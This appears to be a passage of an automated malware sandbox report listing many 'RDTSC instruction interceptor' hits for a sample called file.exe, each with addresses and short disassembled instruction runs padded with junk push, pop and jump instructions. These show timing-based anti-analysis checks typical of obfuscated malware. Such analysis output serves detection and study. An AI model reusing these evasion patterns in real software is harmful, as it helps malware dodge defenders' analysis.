              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C732 second address: D8C738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C9D6 second address: D8C9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jnc 00007F15FCD6BB56h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F15FCD6BB56h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C9EF second address: D8C9F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F15FCC2EA66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93A4B second address: D93A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F15FCD6BB56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F15FCD6BB63h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F15FCD6BB61h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pushad 0x0000001e popad 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 jno 00007F15FCD6BB66h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93A9D second address: D93AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9371E second address: D93737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB63h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA24A7 second address: DA24AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA24AE second address: DA24EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB62h 0x00000007 pushad 0x00000008 jmp 00007F15FCD6BB5Dh 0x0000000d jmp 00007F15FCD6BB68h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA266B second address: DA2671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2671 second address: DA2676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2E3B second address: CC2E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2E54 second address: CC2E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAF28 second address: DBAF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCC2EA6Ch 0x00000009 pop edi 0x0000000a je 00007F15FCC2EA72h 0x00000010 je 00007F15FCC2EA66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB11A second address: DBB11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB11E second address: DBB13D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F15FCC2EA6Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB280 second address: DBB284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB284 second address: DBB288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB3F2 second address: DBB3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB3F8 second address: DBB43F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F15FCC2EA6Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F15FCC2EA6Bh 0x00000018 jo 00007F15FCC2EA7Fh 0x0000001e jmp 00007F15FCC2EA79h 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB6F3 second address: DBB6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB6F9 second address: DBB6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB6FD second address: DBB73B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB67h 0x00000007 jmp 00007F15FCD6BB5Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F15FCD6BB63h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB73B second address: DBB745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB745 second address: DBB749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB931 second address: DBB938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB938 second address: DBB955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCD6BB67h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB955 second address: DBB969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F15FCC2EA66h 0x0000000c jns 00007F15FCC2EA66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC184D second address: DC1857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F15FCD6BB56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1565 second address: DC1569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2558 second address: DD255E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD255E second address: DD25A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F15FCC2EA79h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F15FCC2EA70h 0x00000014 jmp 00007F15FCC2EA76h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD25A7 second address: DD25B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F15FCD6BB56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD25B1 second address: DD25BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15FCC2EA66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD25BB second address: DD25CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F15FCD6BB5Bh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF8F3 second address: DDF8F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF8F7 second address: DDF8FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF47C second address: DDF4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F15FCC2EA73h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F15FCC2EA6Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF4A5 second address: DDF4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jg 00007F15FCD6BB5Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF4B6 second address: DDF4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4E6A second address: DF4E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F15FCD6BB56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4FEA second address: DF4FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF52BD second address: DF52C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF52C3 second address: DF5304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F15FCC2EA70h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jl 00007F15FCC2EA66h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007F15FCC2EA73h 0x0000001d pop esi 0x0000001e popad 0x0000001f pushad 0x00000020 ja 00007F15FCC2EA7Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5A0E second address: DF5A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F15FCD6BB56h 0x0000000a popad 0x0000000b pushad 0x0000000c jbe 00007F15FCD6BB56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9F04 second address: DF9F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9F0A second address: DF9F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9F0E second address: DF9F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9F12 second address: DF9F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F15FCD6BB64h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA151 second address: DFA155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA155 second address: DFA167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA167 second address: DFA186 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F15FCC2EA6Ch 0x00000008 js 00007F15FCC2EA66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jng 00007F15FCC2EA72h 0x00000017 jc 00007F15FCC2EA6Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA232 second address: DFA238 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA238 second address: DFA23F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA4FC second address: DFA53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F15FCD6BB68h 0x0000000e nop 0x0000000f or dword ptr [ebp+1245E6DAh], edi 0x00000015 push dword ptr [ebp+122D1917h] 0x0000001b movzx edx, ax 0x0000001e push 06CFC2D1h 0x00000023 pushad 0x00000024 push esi 0x00000025 jnl 00007F15FCD6BB56h 0x0000002b pop esi 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFD399 second address: DFD3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F15FCC2EA72h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFD3B6 second address: DFD3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFD3BC second address: DFD3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F15FCC2EA66h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12497 second address: D1249C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1249C second address: D124A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100452 second address: 5100481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 pushfd 0x00000006 jmp 00007F15FCD6BB5Eh 0x0000000b xor ecx, 1F050418h 0x00000011 jmp 00007F15FCD6BB5Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100481 second address: 510048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, ABF4h 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510048A second address: 51004E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F15FCD6BB5Fh 0x00000009 xor cx, A58Eh 0x0000000e jmp 00007F15FCD6BB69h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov al, 17h 0x0000001c mov bh, 76h 0x0000001e popad 0x0000001f mov edx, dword ptr [ebp+0Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F15FCD6BB67h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51004E3 second address: 5100532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F15FCC2EA73h 0x00000014 jmp 00007F15FCC2EA78h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206C3 second address: 51206DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCD6BB64h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206DB second address: 51206F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15FCC2EA73h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206F9 second address: 5120711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCD6BB64h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120711 second address: 5120741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f call 00007F15FCC2EA74h 0x00000014 push ecx 0x00000015 pop edx 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ecx, edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120741 second address: 5120772 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 622600CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c jmp 00007F15FCD6BB5Bh 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 push esi 0x00000014 mov si, di 0x00000017 pop edx 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F15FCD6BB5Fh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120772 second address: 512078A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA74h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512078A second address: 51207F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F15FCD6BB66h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F15FCD6BB5Ch 0x0000001a or ah, 00000008h 0x0000001d jmp 00007F15FCD6BB5Bh 0x00000022 popfd 0x00000023 mov bx, si 0x00000026 popad 0x00000027 mov cl, C7h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F15FCD6BB5Eh 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushad 0x00000033 jmp 00007F15FCD6BB5Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51207F8 second address: 51208CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 movzx esi, di 0x00000008 popad 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c jmp 00007F15FCC2EA73h 0x00000011 nop 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F15FCC2EA74h 0x00000019 sbb cx, 6328h 0x0000001e jmp 00007F15FCC2EA6Bh 0x00000023 popfd 0x00000024 call 00007F15FCC2EA78h 0x00000029 pushfd 0x0000002a jmp 00007F15FCC2EA72h 0x0000002f jmp 00007F15FCC2EA75h 0x00000034 popfd 0x00000035 pop eax 0x00000036 popad 0x00000037 push eax 0x00000038 jmp 00007F15FCC2EA6Eh 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 pushfd 0x00000044 jmp 00007F15FCC2EA73h 0x00000049 and eax, 024A67DEh 0x0000004f jmp 00007F15FCC2EA79h 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51208CC second address: 51208DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51208DF second address: 51208E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51208E3 second address: 51208E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51208E7 second address: 51208ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51208ED second address: 51208F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51208F3 second address: 51208F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512090B second address: 5120911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120911 second address: 5120917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120917 second address: 512091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512091B second address: 5120944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-04h], 00000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, edx 0x00000014 mov ah, dl 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120944 second address: 512094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512094A second address: 5120982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edx, ax 0x00000013 pushfd 0x00000014 jmp 00007F15FCC2EA6Ch 0x00000019 and cx, 3628h 0x0000001e jmp 00007F15FCC2EA6Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51209BD second address: 51209C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, dh 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51209C4 second address: 51209CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51209CA second address: 5120A00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F15FCD6BB65h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120A00 second address: 5120A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F15FCC2EA6Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120A25 second address: 5120A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120A2B second address: 5120A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120A2F second address: 5120A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
